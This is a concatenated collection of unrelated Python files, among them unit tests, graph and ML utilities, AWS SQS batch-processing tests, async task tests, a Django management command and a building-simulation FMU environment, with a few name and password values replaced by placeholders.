curly = {"name": '<NAME>', "hair": False}
stooges = [moe, curly]
self.assertTrue(_.find(stooges, _.matches({"hair": False})) == curly,
"returns a predicate that can"
" be used by finding functions.")
self.assertTrue(_.find(stooges, _.matches(moe)) == moe,
"can be used to locate an object"
" exists in a collection.")
if __name__ == "__main__":
print("run these tests by executing `python -m unittest"
" discover` in unittests folder")
unittest.main()
|
497574 | from libs.config import alias
from libs.myapp import is_windows
from os import system
@alias(func_alias="cls")
def run():
"""
clear
Clear screen.
"""
if (is_windows(False)):
system("cls")
else:
system("clear")
|
497576 | import numpy as np
import pgl
import paddle.fluid as fluid
def to_undirected(graph):
""" to_undirected """
inv_edges = np.zeros(graph.edges.shape)
inv_edges[:, 0] = graph.edges[:, 1]
inv_edges[:, 1] = graph.edges[:, 0]
edges = np.vstack((graph.edges, inv_edges))
edges = np.unique(edges, axis=0)
# print(edges.shape)
g = pgl.graph.Graph(num_nodes=graph.num_nodes, edges=edges)
for k, v in graph._node_feat.items():
g._node_feat[k] = v
return g
def add_self_loop(graph):
""" add_self_loop """
self_loop_edges = np.zeros((graph.num_nodes, 2))
self_loop_edges[:, 0] = self_loop_edges[:, 1]=np.arange(graph.num_nodes)
edges = np.vstack((graph.edges, self_loop_edges))
edges = np.unique(edges, axis=0)
# print(edges.shape)
g = pgl.graph.Graph(num_nodes=graph.num_nodes, edges=edges)
for k, v in graph._node_feat.items():
g._node_feat[k] = v
return g
def linear_warmup_decay(learning_rate, warmup_steps, num_train_steps):
""" Applies linear warmup of learning rate from 0 and decay to 0."""
with fluid.default_main_program()._lr_schedule_guard():
lr = fluid.layers.tensor.create_global_var(
shape=[1],
value=0.0,
dtype='float32',
persistable=True,
name="scheduled_learning_rate")
global_step = fluid.layers.learning_rate_scheduler._decay_step_counter()
with fluid.layers.control_flow.Switch() as switch:
with switch.case(global_step < warmup_steps):
warmup_lr = learning_rate * (global_step / warmup_steps)
fluid.layers.tensor.assign(warmup_lr, lr)
with switch.default():
decayed_lr = fluid.layers.learning_rate_scheduler.polynomial_decay(
learning_rate=learning_rate,
decay_steps=num_train_steps,
end_learning_rate=0.0,
power=1.0,
cycle=False)
fluid.layers.tensor.assign(decayed_lr, lr)
return lr, global_step
def add_vnode(graph, num_vnode=1):
""" add_vnode """
num_nodes = graph.num_nodes + num_vnode
src = np.tile(np.arange(num_nodes), [num_vnode, 1]).reshape(-1)
dst = np.tile(np.arange(graph.num_nodes, num_nodes), [num_nodes, 1]).T.reshape(-1)
new_edges = np.stack([src, dst]).T
edges = np.vstack((graph.edges, new_edges))
g = pgl.graph.Graph(num_nodes=num_nodes, edges=edges)
for k, v in graph._node_feat.items():
new_feat = np.tile(v.mean(0), [num_vnode, 1])
print(new_feat.shape)
v = np.concatenate([v, new_feat])
g._node_feat[k] = v
return g
|
497591 | import os
import typing as t
from pathlib import Path
from starwhale.utils import console, in_production
from starwhale.consts import DefaultYAMLName, DEFAULT_PAGE_IDX, DEFAULT_PAGE_SIZE
from starwhale.base.uri import URI
from starwhale.base.type import URIType, EvalTaskType, InstanceType
from starwhale.base.view import BaseTermView
from starwhale.core.model.store import ModelStorage
from .model import Model, StandaloneModel
class ModelTermView(BaseTermView):
def __init__(self, model_uri: str) -> None:
super().__init__()
self.raw_uri = model_uri
self.uri = URI(model_uri, expected_type=URIType.MODEL)
self.model = Model.get_model(self.uri)
@BaseTermView._simple_action_print
def remove(self, force: bool = False) -> t.Tuple[bool, str]:
return self.model.remove(force)
@BaseTermView._simple_action_print
def recover(self, force: bool = False) -> t.Tuple[bool, str]:
return self.model.recover(force)
@BaseTermView._header
def info(self, fullname: bool = False) -> None:
self._print_info(self.model.info(), fullname=fullname)
@BaseTermView._pager
@BaseTermView._header
def history(
self, fullname: bool = False
) -> t.Tuple[t.List[t.Dict[str, t.Any]], t.Dict[str, t.Any]]:
fullname = fullname or self.uri.instance_type == InstanceType.CLOUD
return self._print_history(
title="Model History List", history=self.model.history(), fullname=fullname
)
def extract(self, force: bool = False, target_dir: str = "") -> None:
console.print(":oncoming_police_car: try to extract ...")
path = self.model.extract(force, target_dir)
console.print(f":clap: extracted @ {path.resolve()} :tada:")
@classmethod
def eval(
cls,
target: str,
yaml_name: str = DefaultYAMLName.MODEL,
typ: str = "",
kw: t.Dict[str, t.Any] = {},
) -> None:
if in_production() or (os.path.exists(target) and os.path.isdir(target)):
workdir = Path(target)
else:
uri = URI(target, URIType.MODEL)
store = ModelStorage(uri)
workdir = store.loc
if typ in (EvalTaskType.CMP, EvalTaskType.PPL):
console.print(f":golfer: try to eval {typ} @ {workdir}...")
StandaloneModel.eval_user_handler(
typ,
workdir,
yaml_name=yaml_name,
kw=kw,
)
else:
pass
@classmethod
@BaseTermView._pager
@BaseTermView._header
def list(
cls,
project_uri: str = "",
fullname: bool = False,
show_removed: bool = False,
page: int = DEFAULT_PAGE_IDX,
size: int = DEFAULT_PAGE_SIZE,
) -> t.Tuple[t.Dict[str, t.Any], t.Dict[str, t.Any]]:
_uri = URI(project_uri, expected_type=URIType.PROJECT)
fullname = fullname or (_uri.instance_type == InstanceType.CLOUD)
_models, _pager = Model.list(_uri, page, size)
BaseTermView._print_list(_models, show_removed, fullname)
return _models, _pager
@classmethod
def build(
cls, workdir: str, project: str, yaml_name: str = DefaultYAMLName.MODEL
) -> None:
_model_uri = cls.prepare_build_bundle(
workdir, project, yaml_name, URIType.MODEL
)
_m = Model.get_model(_model_uri)
_m.build(Path(workdir), yaml_name)
@classmethod
def copy(cls, src_uri: str, dest_uri: str, force: bool = False) -> None:
Model.copy(src_uri, dest_uri, force)
console.print(":clap: copy done.")
@BaseTermView._header
def tag(self, tags: str, remove: bool = False, quiet: bool = False) -> None:
_tags = tags.split(",")
if remove:
console.print(f":golfer: remove tags [red]{tags}[/] @ {self.uri}...")
self.model.remove_tags(_tags, quiet)
else:
console.print(f":surfer: add tags [red]{tags}[/] @ {self.uri}...")
self.model.add_tags(_tags, quiet)
|
497592 | from typing import Callable
from unittest.mock import patch
import pytest
from botocore.config import Config
from botocore.stub import Stubber
from aws_lambda_powertools.utilities.batch import PartialSQSProcessor, batch_processor, sqs_batch_processor
from aws_lambda_powertools.utilities.batch.exceptions import SQSBatchProcessingError
@pytest.fixture(scope="module")
def sqs_event_factory() -> Callable:
def factory(body: str):
return {
"messageId": "059f36b4-87a3-44ab-83d2-661975830a7d",
"receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a",
"body": body,
"attributes": {},
"messageAttributes": {},
"md5OfBody": "e4e68fb7bd0e697a0ae8f1bb342846b3",
"eventSource": "aws:sqs",
"eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue",
"awsRegion": "us-east-1",
}
return factory
@pytest.fixture(scope="module")
def record_handler() -> Callable:
def handler(record):
body = record["body"]
if "fail" in body:
raise Exception("Failed to process record.")
return body
return handler
@pytest.fixture(scope="module")
def config() -> Config:
return Config(region_name="us-east-1")
@pytest.fixture(scope="function")
def partial_processor(config) -> PartialSQSProcessor:
return PartialSQSProcessor(config=config)
@pytest.fixture(scope="function")
def partial_processor_suppressed(config) -> PartialSQSProcessor:
return PartialSQSProcessor(config=config, suppress_exception=True)
@pytest.fixture(scope="function")
def stubbed_partial_processor(config) -> PartialSQSProcessor:
processor = PartialSQSProcessor(config=config)
with Stubber(processor.client) as stubber:
yield stubber, processor
@pytest.fixture(scope="function")
def stubbed_partial_processor_suppressed(config) -> PartialSQSProcessor:
processor = PartialSQSProcessor(config=config, suppress_exception=True)
with Stubber(processor.client) as stubber:
yield stubber, processor
def test_partial_sqs_processor_context_with_failure(sqs_event_factory, record_handler, partial_processor):
"""
Test processor with one failing record
"""
fail_record = sqs_event_factory("fail")
success_record = sqs_event_factory("success")
records = [fail_record, success_record]
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor.client) as stubber:
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
with partial_processor(records, record_handler) as ctx:
ctx.process()
assert len(error.value.child_exceptions) == 1
stubber.assert_no_pending_responses()
def test_partial_sqs_processor_context_only_success(sqs_event_factory, record_handler, partial_processor):
"""
Test processor without failure
"""
first_record = sqs_event_factory("success")
second_record = sqs_event_factory("success")
records = [first_record, second_record]
with partial_processor(records, record_handler) as ctx:
result = ctx.process()
assert result == [
("success", first_record["body"], first_record),
("success", second_record["body"], second_record),
]
def test_partial_sqs_processor_context_multiple_calls(sqs_event_factory, record_handler, partial_processor):
"""
Test processor without failure
"""
first_record = sqs_event_factory("success")
second_record = sqs_event_factory("success")
records = [first_record, second_record]
with partial_processor(records, record_handler) as ctx:
ctx.process()
with partial_processor([first_record], record_handler) as ctx:
ctx.process()
assert partial_processor.success_messages == [first_record]
def test_batch_processor_middleware_with_partial_sqs_processor(sqs_event_factory, record_handler, partial_processor):
"""
Test middleware's integration with PartialSQSProcessor
"""
@batch_processor(record_handler=record_handler, processor=partial_processor)
def lambda_handler(event, context):
return True
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor.client) as stubber:
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
lambda_handler(event, {})
assert len(error.value.child_exceptions) == 2
stubber.assert_no_pending_responses()
@patch("aws_lambda_powertools.utilities.batch.sqs.PartialSQSProcessor")
def test_sqs_batch_processor_middleware(
patched_sqs_processor, sqs_event_factory, record_handler, stubbed_partial_processor
):
"""
Test middleware's integration with PartialSQSProcessor
"""
@sqs_batch_processor(record_handler=record_handler)
def lambda_handler(event, context):
return True
stubber, processor = stubbed_partial_processor
patched_sqs_processor.return_value = processor
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
lambda_handler(event, {})
assert len(error.value.child_exceptions) == 1
stubber.assert_no_pending_responses()
def test_batch_processor_middleware_with_custom_processor(capsys, sqs_event_factory, record_handler, config):
"""
Test middlewares' integration with custom batch processor
"""
class CustomProcessor(PartialSQSProcessor):
def failure_handler(self, record, exception):
print("Oh no ! It's a failure.")
return super().failure_handler(record, exception)
processor = CustomProcessor(config=config)
@batch_processor(record_handler=record_handler, processor=processor)
def lambda_handler(event, context):
return True
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(processor.client) as stubber:
stubber.add_response("delete_message_batch", response)
with pytest.raises(SQSBatchProcessingError) as error:
lambda_handler(event, {})
stubber.assert_no_pending_responses()
assert len(error.value.child_exceptions) == 1
assert capsys.readouterr().out == "Oh no ! It's a failure.\n"
def test_batch_processor_middleware_suppressed_exceptions(
sqs_event_factory, record_handler, partial_processor_suppressed
):
"""
Test middleware's integration with PartialSQSProcessor
"""
@batch_processor(record_handler=record_handler, processor=partial_processor_suppressed)
def lambda_handler(event, context):
return True
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor_suppressed.client) as stubber:
stubber.add_response("delete_message_batch", response)
result = lambda_handler(event, {})
stubber.assert_no_pending_responses()
assert result is True
def test_partial_sqs_processor_suppressed_exceptions(sqs_event_factory, record_handler, partial_processor_suppressed):
"""
Test processor without failure
"""
first_record = sqs_event_factory("success")
second_record = sqs_event_factory("fail")
records = [first_record, second_record]
fail_record = sqs_event_factory("fail")
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
with Stubber(partial_processor_suppressed.client) as stubber:
stubber.add_response("delete_message_batch", response)
with partial_processor_suppressed(records, record_handler) as ctx:
ctx.process()
assert partial_processor_suppressed.success_messages == [first_record]
@patch("aws_lambda_powertools.utilities.batch.sqs.PartialSQSProcessor")
def test_sqs_batch_processor_middleware_suppressed_exception(
patched_sqs_processor, sqs_event_factory, record_handler, stubbed_partial_processor_suppressed
):
"""
Test middleware's integration with PartialSQSProcessor
"""
@sqs_batch_processor(record_handler=record_handler)
def lambda_handler(event, context):
return True
stubber, processor = stubbed_partial_processor_suppressed
patched_sqs_processor.return_value = processor
fail_record = sqs_event_factory("fail")
event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]}
response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []}
stubber.add_response("delete_message_batch", response)
result = lambda_handler(event, {})
stubber.assert_no_pending_responses()
assert result is True
def test_partial_sqs_processor_context_only_failure(sqs_event_factory, record_handler, partial_processor):
"""
Test processor with only failures
"""
first_record = sqs_event_factory("fail")
second_record = sqs_event_factory("fail")
records = [first_record, second_record]
with pytest.raises(SQSBatchProcessingError) as error:
with partial_processor(records, record_handler) as ctx:
ctx.process()
assert len(error.value.child_exceptions) == 2
|
497604 | from sklearn.cluster import MeanShift
from sklearn.datasets.samples_generator import make_blobs
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import style
style.use('ggplot')
# Create random data points whose centers are the following
centers = [[20, 0, 0], [0, 20, 0], [0, 0, 20], [0, 0, 0]]
X, _ = make_blobs(n_samples=200, centers=centers, cluster_std=2)
# Fit the data into MeanShift classifier with search bandwidth = 10
clf = MeanShift(bandwidth=10)
clf.fit(X)
# Get the labels of each data point
# and cluster centers of the number of clusters formed
labels = clf.labels_
cluster_centers = clf.cluster_centers_
print(cluster_centers)
n_clusters = len(cluster_centers)
print('Number of clusters found:', n_clusters)
# Plot the data points with their clusters and centers on a 3d graph
colors = 10*['r', 'g', 'b', 'y', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in range(len(X)):
ax.scatter(X[i][0], X[i][1], X[i][2], c=colors[labels[i]], marker='o')
ax.scatter(cluster_centers[:, 0], cluster_centers[:, 1], cluster_centers[:, 2],
marker='x', s=150, linewidth=5, zorder=10, color='k')
plt.show()
|
497615 | n = int(input())
a = list(map(int, input().split()))
b = list(map(int, input().split()))
print('Yes' if sum(x * y for x, y in zip(a, b)) == 0 else 'No') |
497620 | from hippy.klass import def_class
from hippy.builtin_klass import k_Exception
k_LogicException = def_class('LogicException', [], extends=k_Exception)
k_BadFunctionCallException = def_class('BadFunctionCallException', [],
extends=k_LogicException)
k_BadMethodCallException = def_class('BadMethodCallException', [],
extends=k_BadFunctionCallException)
k_InvalidArgumentException = def_class('InvalidArgumentException', [],
extends=k_BadFunctionCallException)
k_DomainException = def_class('DomainException', [], extends=k_LogicException)
k_RuntimeException = def_class('RuntimeException', [], extends=k_Exception)
k_UnexpectedValueException = def_class('UnexpectedValueException', [],
extends=k_RuntimeException)
|
497624 | from setuptools import setup
from setuptools.extension import Extension
import numpy as np
import os
import re
from glob import glob
from pathlib import Path
with open(os.path.join(os.path.dirname(__file__), "econml", "_version.py")) as file:
for line in file:
m = re.fullmatch("__version__ = '([^']+)'\n", line)
if m:
version = m.group(1)
pyx_files = glob("econml/**/*.pyx", recursive=True)
c_files = glob("econml/**/*.c", recursive=True)
# If both a .pyx and a .c file exist, we assume the .c file is up to date and don't force a recompile
pyx_files = [file for file in pyx_files if (os.path.splitext(file)[0] + ".c") not in c_files]
c_extensions = [Extension(os.path.splitext(file)[0].replace(os.sep, '.'),
[file],
include_dirs=[np.get_include()])
for file in c_files]
if pyx_files:
from Cython.Build import cythonize
pyx_extensions = cythonize([Extension("*",
pyx_files,
include_dirs=[np.get_include()])],
language_level="3")
else:
pyx_extensions = []
# configuration is all pulled from setup.cfg
setup(ext_modules=c_extensions + pyx_extensions,
zip_safe=False,
version=version)
|
497671 | from utils.db.mongo_orm import *
class TestEnvParam(Model):
class Meta:
database = db
collection = 'testEnvParam'
# Fields
_id = ObjectIdField()
name = StringField(field_name='name')
paramValue = StringField(field_name='paramValue')
testEnvId = ObjectIdField()
description = StringField()
status = BooleanField(field_name='status', default=False)
projectId = ObjectIdField()
isDeleted = BooleanField(field_name='isDeleted', default=False)
createAt = DateField()
lastUpdateTime = DateField()
createUser = StringField()
lastUpdateUser = StringField()
def __str__(self):
return "key:{} - value:{} - testEnvId:{} - description:{} - projectId:{}" \
.format(self.key, self.value, self.testEnvId, self.description, self.projectId)
if __name__ == '__main__':
pass
|
497682 | import pytest
import aerosandbox.numpy as np
import casadi as cas
def test_norm_vector():
a = np.array([1, 2, 3])
cas_a = cas.DM(a)
assert np.linalg.norm(a) == np.linalg.norm(cas_a)
def test_norm_2D():
a = np.arange(9).reshape(3, 3)
cas_a = cas.DM(a)
assert np.linalg.norm(cas_a) == np.linalg.norm(a)
assert np.all(
np.linalg.norm(cas_a, axis=0) ==
np.linalg.norm(a, axis=0)
)
assert np.all(
np.linalg.norm(cas_a, axis=1) ==
np.linalg.norm(a, axis=1)
)
if __name__ == '__main__':
pytest.main()
|
497687 | import tensorflow as tf
from tensorflow.python.framework import ops
_trace_norm = tf.load_op_library('trace_norm.so')
@ops.RegisterGradient("TraceNorm")
def _trace_norm_grad(op, grad, g_u, g_v):
"""The gradients for `trace_norm`.
Args:
op: The `trace_norm` `Operation` that we are differentiating, which we can use
to find the inputs and outputs of the original op.
grad: Gradient with respect to the output of the `trace_norm` op.
Returns:
Gradients with respect to the input of `trace_norm`.
"""
# TODO: Ensure that we are only using the gradient of the trace norm.
# and not the `u' and `v' matrices.
_, u, v = op.outputs
trace_grad = tf.matmul(u, v, transpose_b=True)
return [grad * trace_grad]
def regularize(inputs, regularisation):
return inputs + tf.ones_like(inputs) * regularisation
def correlation_cost(source, target, source_regularisation=0, target_regularisation=0, use_target=True):
num_source_samples = source.get_shape().as_list()[0]
num_target_samples = target.get_shape().as_list()[0]
# assert num_source_samples == num_target_samples
num_samples = tf.to_float(tf.shape(target)[0])
source -= tf.reduce_mean(source, 0)
target -= tf.reduce_mean(target, 0)
correlation_matrix = tf.matmul(source, target, transpose_a=True) / (num_samples - 1)
source_covariance = regularize(tf.matmul(source, source, transpose_a=True) / (num_samples-1), source_regularisation)
# source_covariance = (tf.transpose(source_covariance) + source_covariance) / 2.
root_source_covariance = tf.cholesky(source_covariance)
inv_root_source_covariance = tf.matrix_inverse(root_source_covariance)
canonical_correlation = tf.matmul(inv_root_source_covariance, correlation_matrix)
if use_target:
target_covariance = regularize(tf.matmul(target, target, transpose_a=True) / (num_samples-1), source_regularisation)
root_target_covariance = tf.cholesky(target_covariance)
inv_root_target_covariance = tf.matrix_inverse(root_target_covariance)
canonical_correlation = tf.matmul(canonical_correlation, inv_root_target_covariance)
loss, u, v = _trace_norm.trace_norm(canonical_correlation)
return - loss |
497746 | import pyecharts.options as opts
from pyecharts.charts import Line
from pyecharts.faker import Faker
c = (
Line()
.add_xaxis(Faker.choose())
.add_yaxis("商家A", Faker.values(), areastyle_opts=opts.AreaStyleOpts(opacity=0.5))
.add_yaxis("商家B", Faker.values(), areastyle_opts=opts.AreaStyleOpts(opacity=0.5))
.set_global_opts(title_opts=opts.TitleOpts(title="Line-面积图"))
.render("line_area_style.html")
)
|
497765 | import requests
from requests.auth import HTTPBasicAuth
from yelp_beans.data_providers.data_provider import DataProvider
class RestfulJSONDataProvider(DataProvider):
def __init__(self, url, username=None, password=<PASSWORD>, timeout=60.0):
self.url = url
self.username = username
self.password = password
self.timeout = timeout
def _authentication(self):
if self.username and self.password:
return HTTPBasicAuth(self.username, self.password)
def _fetch(self, data):
result = requests.get(
self.url,
auth=self._authentication(),
timeout=self.timeout,
)
result.raise_for_status()
return result.json()
|
497795 | import unittest
import logging
import pytest
from botoflow.core.async_event_loop import AsyncEventLoop
from botoflow.core.async_task import AsyncTask
from botoflow.core.decorators import task
from botoflow.core.base_future import BaseFuture
from botoflow.core.exceptions import CancellationError
from botoflow.logging_filters import BotoflowFilter
logging.basicConfig(level=logging.DEBUG,
format='%(filename)s:%(lineno)d (%(funcName)s) - %(message)s')
logging.getLogger('botoflow').addFilter(BotoflowFilter())
pytestmark = pytest.mark.usefixtures('core_debug')
class TestTask(unittest.TestCase):
def setUp(self):
self.counter = 0
self.except_called = False
self.finally_called = False
@task
def count(self):
self.counter += 1
def test_task(self):
ev = AsyncEventLoop()
with ev:
self.count()
ev.execute_all_tasks()
self.assertEqual(1, self.counter)
def test_two_tasks(self):
ev = AsyncEventLoop()
with ev:
self.count()
self.count()
ev.execute_all_tasks()
self.assertEqual(2, self.counter)
def test_recursive(self):
ev = AsyncEventLoop()
@task
def recursive(ct=10):
self.counter += 1
if ct == 1:
return
ct -=1
recursive(ct)
with ev:
recursive()
ev.execute_all_tasks()
self.assertEqual(10, self.counter)
def test_exceptions(self):
@task
def task_func():
raise RuntimeError("Test")
@task_func.do_except
def except_func(err):
self.except_called = True
@task_func.do_finally
def finally_func():
self.finally_called = True
ev = AsyncEventLoop()
with ev:
task_func()
ev.execute_all_tasks()
self.assertTrue(self.except_called)
self.assertTrue(self.finally_called)
def test_task_finally(self):
@task
def recursive(ct=1):
self.counter += 1
if ct == 1:
return
ct -=1
recursive(ct)
@task
def recursive_caller():
recursive()
@recursive_caller.do_finally
def finally_func():
self.finally_called = True
ev = AsyncEventLoop()
with ev:
recursive_caller()
ev.execute_all_tasks()
self.assertTrue(self.finally_called)
def test_tasks_finally(self):
@task
def recursive(ct=10):
if ct == 1:
return
ct -=1
recursive(ct)
@recursive.do_finally
def recursive():
self.counter += 1
ev = AsyncEventLoop()
with ev:
recursive()
ev.execute_all_tasks()
self.assertEqual(10, self.counter)
def test_finally_with_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def count():
self.counter +=1
@count.do_finally
def count():
self.counter += 1
count()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(4, self.counter)
def test_finally_with_err_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_finally
def err():
self.counter += 1
err()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_except_with_err_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
err()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_finally_reraise_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
raise err
err()
ev = AsyncEventLoop()
with ev:
count()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_finally_reraise_catch_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
raise err
err()
@task
def main():
self.counter +=1
count()
@main.do_except
def main(err):
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(5, self.counter)
def test_finally_reraise_catch_finally_subtask(self):
@task
def count():
self.counter += 1
@count.do_finally
def count():
self.counter += 1
@task
def err():
raise RuntimeError("Test")
@err.do_except
def err(err):
if isinstance(err, RuntimeError):
self.counter += 1
raise err
err()
@task
def main():
self.counter +=1
count()
@main.do_except
def main(err):
self.counter += 1
@main.do_finally
def main():
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(6, self.counter)
def test_except_and_finally_raise(self):
@task
def raises():
raise RuntimeError("Error")
@raises.do_except
def raises(err):
raise err
@raises.do_finally
def raises():
raise ValueError("Finally wins")
@task
def main():
raises()
@main.do_except
def main(err):
if isinstance(err, ValueError):
self.except_called = True
elif isinstance(err, RuntimeError):
self.except_called = False
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertTrue(self.except_called)
def test_cancel_before_except(self):
@task
def raises():
raise RuntimeError("Error")
@task
def main():
raises()
self.count()
self.count()
@main.do_except
def main(err):
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(1, self.counter)
def test_cancel_except_finally(self):
@task
def raises():
raise RuntimeError("Error")
@task
def other():
self.counter -= 1
@other.do_except
def other(err):
if isinstance(err, CancellationError):
self.counter += 1
@other.do_finally
def other():
self.counter += 1
@task
def main():
raises()
other()
@main.do_except
def main(err):
self.counter += 1
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(3, self.counter)
def test_future(self):
future = BaseFuture()
@task
def other():
future.set_result(1)
@task
def main():
other()
ev = AsyncEventLoop()
with ev:
main()
ev.execute_all_tasks()
self.assertEqual(1, future.result())
def test_future_with_task(self):
future = BaseFuture()
def count():
self.counter +=1
@task
def other():
future.set_result(1)
@task
def main():
other()
ev = AsyncEventLoop()
with ev:
future.add_task(AsyncTask(count))
main()
ev.execute_all_tasks()
self.assertEqual(1, future.result())
self.assertEqual(1, self.counter)
if __name__ == '__main__':
unittest.main()
|
497837 | import csv
from django.core.management.base import BaseCommand
from api.models import Country, District
from django.db import transaction
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
class Command(BaseCommand):
help = 'Maps some orphan districts to countries. join_districts_to_country.csv is required (Johnny)'
missing_args_message = "Filename is missing. A valid CSV file is required."
def add_arguments(self, parser):
parser.add_argument('filename', nargs='+', type=str)
@transaction.atomic
def handle(self, *args, **options):
filename = options['filename'][0]
rows = csv.DictReader(open(filename, 'r'), fieldnames=['District code', 'Country ISO'])
next(rows)
for row in rows:
dcode = row['District code']
iso = row['Country ISO']
try:
country = Country.objects.get(iso=iso, record_type=1)
district = District.objects.get(code=dcode)
district.country = country
district.country_name = country.name
district.country_iso = country.iso
district.save()
except ObjectDoesNotExist:
print(f'Missing Country ({iso}) or District ({dcode})')
except MultipleObjectsReturned:
print(f'More than one Country with ({iso}) or District with ({dcode})')
print('Done!')
|
497855 | import logging
import os
from energym.envs.env_fmu import EnvFMU
from energym.envs.utils.weather import MOS
from energym.envs.weather_names import WEATHERNAMES
import energym
logger = logging.getLogger(__name__)
class EnvModFMU(EnvFMU):
"""Base class for Modelica based FMU simulation models.
Subclasses EnvFMU and inherits its behavior. Defines Modelica
specific simulation details.
Methods
--------
set_model_variables(variables, values)
Sets value of model variables (Modelica).
get_variable_data(list_vars)
Retrieves data for a list of variables.
"""
def __init__(
self,
model_path,
start_time,
stop_time,
step_size,
weather,
params,
init_vals,
input_specs,
output_specs,
kpi_options,
default_path=True,
generate_forecasts=True,
generate_forecast_method="perfect",
generate_forecast_keys=None,
):
"""
Parameters
----------
model_path : str
Specifies the path to the FMU
start_time : int
Begin of the simulation time in seconds in relation to the
beginning of the year
stop_time : int
End of the simulation time in seconds in relation to the
beginning of the year
step_size : float
Length of a simulation timestep in seconds
weather : str
Specifies the used weather file
input_specs : dict
Contains the inputs of the model
output_specs : dict
Contains the outputs of the model
kpi_options : dict
Dict to specify the tracked KPIs.
default_path : bool, optional
Whether to use the default path or an absolute path in model_path and weather
Raises
------
Exception
If the passed weather file is not contained in the list of
available weather files
"""
self.params = params
if default_path:
path = os.path.abspath(energym.__file__)
path = os.path.abspath(os.path.join(path, "..", ".."))
fmu_file = os.path.join(
path,
"simulation",
"modelica",
model_path + ".fmu",
)
else:
fmu_file = model_path
if weather is None:
super().__init__(
fmu_file,
start_time,
stop_time,
step_size,
weather,
input_specs,
output_specs,
kpi_options,
default_path,
)
self.look_for_weather_file()
else:
weather_mos = MOS()
if default_path:
if weather in WEATHERNAMES:
weather_file = os.path.join(
path,
"simulation",
"modelica",
model_path.split(os.sep)[0],
"wf",
WEATHERNAMES[weather] + ".mos",
)
weather_mos.read(
weather_file,
generate_forecasts,
generate_forecast_method,
generate_forecast_keys,
)
else:
raise Exception("Unknown weather file")
else:
weather_file = weather
weather_mos.read(
weather,
generate_forecasts,
generate_forecast_method,
generate_forecast_keys,
)
super().__init__(
fmu_file,
start_time,
stop_time,
step_size,
weather_mos,
input_specs,
output_specs,
kpi_options,
default_path,
weather_file,
)
self.init_vals = {key: init_vals[key] for key in self.input_keys}
print("the initial variables are", self.init_vals)
self.set_model_variables(list(params.keys()), list(params.values()))
self.set_model_variables(
list(self.init_vals.keys()), list(self.init_vals.values())
)
def set_model_variables(self, variables, values):
"""Sets value of model variables.
Parameters
----------
variables: str or list
list of variables to set
values: str or list
list of values to set
"""
if self.is_fmu_initialized:
logger.warning(
"FMU is already initialized. Values set may not be propagated in model as expected."
)
if isinstance(variables, str):
self.set_model_variables([variables], [values])
elif isinstance(variables, list):
self.fmu.setReal([self.vrs[v] for v in variables], values)
else:
TypeError("variables should be list of str")
def get_variable_data(self, list_vars):
"""Retrieves data for a list of variables.
Parameters
----------
list_vars : list
List of variables to retrieve. Variables can be outputs of the model or internal variables.
Returns
-------
dict
Dictionary with values for the variables.
"""
# get the values
out_values = self.fmu.getReal([self.vrs[key] for key in list_vars])
res = [(self.time, out_values)]
return self.post_process(list_vars, res)
def get_output(self):
out = self.fmu.getReal([self.vrs[key] for key in self.output_keys])
res = [(self.time, out)]
output = self.post_process(self.output_keys, res, arrays=False)
return output
def reset(self):
super().reset()
self.set_model_variables(list(self.params.keys()), list(self.params.values()))
self.set_model_variables(
list(self.init_vals.keys()), list(self.init_vals.values())
)
|
497856 | import torch
import torch.nn as nn
import torch.nn.functional as F
